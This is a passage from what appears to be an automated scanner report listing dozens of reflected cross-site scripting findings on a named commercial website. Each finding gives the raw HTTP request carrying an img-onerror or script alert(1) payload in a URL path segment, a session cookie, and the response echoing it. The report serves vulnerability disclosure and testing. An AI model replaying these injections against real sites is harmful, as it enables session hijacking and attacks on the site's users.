This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingf088b</title><img%20src%3da%20onerror%3dalert(1)>8a79d5525ab/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/ratingf088b</title><img src=a onerror=alert(1)>8a79d5525ab/2half.gif</title>
...[SNIP]...

2.4471. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2beb<img%20src%3da%20onerror%3dalert(1)>42cbb0739f7 was submitted in the REST URL parameter 5. This input was echoed as c2beb<img src=a onerror=alert(1)>42cbb0739f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingc2beb<img%20src%3da%20onerror%3dalert(1)>42cbb0739f7/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratingc2beb<img src=a onerror=alert(1)>42cbb0739f7/2half.gif]</td>
...[SNIP]...

2.4472. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 37ebc</title><img%20src%3da%20onerror%3dalert(1)>3878883e8ee was submitted in the REST URL parameter 6. This input was echoed as 37ebc</title><img src=a onerror=alert(1)>3878883e8ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/2half.gif37ebc</title><img%20src%3da%20onerror%3dalert(1)>3878883e8ee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/2half.gif37ebc</title><img src=a onerror=alert(1)>3878883e8ee</title>
...[SNIP]...

2.4473. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bc483<img%20src%3da%20onerror%3dalert(1)>16c5dba9175 was submitted in the REST URL parameter 6. This input was echoed as bc483<img src=a onerror=alert(1)>16c5dba9175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/2half.gifbc483<img%20src%3da%20onerror%3dalert(1)>16c5dba9175 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/2half.gifbc483<img src=a onerror=alert(1)>16c5dba9175]</td>
...[SNIP]...

2.4474. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8f16<script>alert(1)</script>4ec26728f7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tage8f16<script>alert(1)</script>4ec26728f7d/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage8f16<script>alert(1)</script>4ec26728f7d/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.4475. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ecaf5</title><img%20src%3da%20onerror%3dalert(1)>3a0e3970892 was submitted in the REST URL parameter 2. This input was echoed as ecaf5</title><img src=a onerror=alert(1)>3a0e3970892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesecaf5</title><img%20src%3da%20onerror%3dalert(1)>3a0e3970892/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesecaf5</title><img src=a onerror=alert(1)>3a0e3970892/kosmos/images/rating/3half.gif</title>
...[SNIP]...

2.4476. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 169aa<img%20src%3da%20onerror%3dalert(1)>cac0777d310 was submitted in the REST URL parameter 2. This input was echoed as 169aa<img src=a onerror=alert(1)>cac0777d310 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes169aa<img%20src%3da%20onerror%3dalert(1)>cac0777d310/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes169aa<img src=a onerror=alert(1)>cac0777d310/kosmos/images/rating/3half.gif]</td>
...[SNIP]...

2.4477. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3dc6c</title><img%20src%3da%20onerror%3dalert(1)>a0aa919af9 was submitted in the REST URL parameter 3. This input was echoed as 3dc6c</title><img src=a onerror=alert(1)>a0aa919af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos3dc6c</title><img%20src%3da%20onerror%3dalert(1)>a0aa919af9/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos3dc6c</title><img src=a onerror=alert(1)>a0aa919af9/images/rating/3half.gif</title>
...[SNIP]...

2.4478. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58391<img%20src%3da%20onerror%3dalert(1)>cdba8b16790 was submitted in the REST URL parameter 3. This input was echoed as 58391<img src=a onerror=alert(1)>cdba8b16790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos58391<img%20src%3da%20onerror%3dalert(1)>cdba8b16790/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos58391<img src=a onerror=alert(1)>cdba8b16790/images/rating/3half.gif]</td>
...[SNIP]...

2.4479. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e50b9<img%20src%3da%20onerror%3dalert(1)>38b4a24a89b was submitted in the REST URL parameter 4. This input was echoed as e50b9<img src=a onerror=alert(1)>38b4a24a89b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagese50b9<img%20src%3da%20onerror%3dalert(1)>38b4a24a89b/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagese50b9<img src=a onerror=alert(1)>38b4a24a89b/rating/3half.gif]</td>
...[SNIP]...

2.4480. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload f05bb</title><img%20src%3da%20onerror%3dalert(1)>6ac1571b7ac was submitted in the REST URL parameter 4. This input was echoed as f05bb</title><img src=a onerror=alert(1)>6ac1571b7ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesf05bb</title><img%20src%3da%20onerror%3dalert(1)>6ac1571b7ac/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesf05bb</title><img src=a onerror=alert(1)>6ac1571b7ac/rating/3half.gif</title>
...[SNIP]...

2.4481. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f6efa<img%20src%3da%20onerror%3dalert(1)>f54f768fb78 was submitted in the REST URL parameter 5. This input was echoed as f6efa<img src=a onerror=alert(1)>f54f768fb78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingf6efa<img%20src%3da%20onerror%3dalert(1)>f54f768fb78/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratingf6efa<img src=a onerror=alert(1)>f54f768fb78/3half.gif]</td>
...[SNIP]...

2.4482. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 1d7f8</title><img%20src%3da%20onerror%3dalert(1)>f1072a8c3c9 was submitted in the REST URL parameter 5. This input was echoed as 1d7f8</title><img src=a onerror=alert(1)>f1072a8c3c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating1d7f8</title><img%20src%3da%20onerror%3dalert(1)>f1072a8c3c9/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating1d7f8</title><img src=a onerror=alert(1)>f1072a8c3c9/3half.gif</title>
...[SNIP]...

2.4483. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d37a5<img%20src%3da%20onerror%3dalert(1)>687134f9e8d was submitted in the REST URL parameter 6. This input was echoed as d37a5<img src=a onerror=alert(1)>687134f9e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/3half.gifd37a5<img%20src%3da%20onerror%3dalert(1)>687134f9e8d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/3half.gifd37a5<img src=a onerror=alert(1)>687134f9e8d]</td>
...[SNIP]...

2.4484. http://www.resellerbase.com/tag/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload ae1ad</title><img%20src%3da%20onerror%3dalert(1)>65ad9e6585 was submitted in the REST URL parameter 6. This input was echoed as ae1ad</title><img src=a onerror=alert(1)>65ad9e6585 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/3half.gifae1ad</title><img%20src%3da%20onerror%3dalert(1)>65ad9e6585 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/3half.gifae1ad</title><img src=a onerror=alert(1)>65ad9e6585</title>
...[SNIP]...

2.4485. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7416<script>alert(1)</script>8764346dd4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagc7416<script>alert(1)</script>8764346dd4b/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagc7416<script>alert(1)</script>8764346dd4b/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.4486. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6094f<img%20src%3da%20onerror%3dalert(1)>a80e29b2782 was submitted in the REST URL parameter 2. This input was echoed as 6094f<img src=a onerror=alert(1)>a80e29b2782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes6094f<img%20src%3da%20onerror%3dalert(1)>a80e29b2782/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes6094f<img src=a onerror=alert(1)>a80e29b2782/kosmos/images/rating/4.gif]</td>
...[SNIP]...

2.4487. http://www.resellerbase.com/tag/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7d299</title><img%20src%3da%20onerror%3dalert(1)>899e9577b6 was submitted in the REST URL parameter 2. This input was echoed as 7d299</title><img src=a onerror=alert(1)>899e9577b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes7d299</title><img%20src%3da%20onerror%3dalert(1)>899e9577b6/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
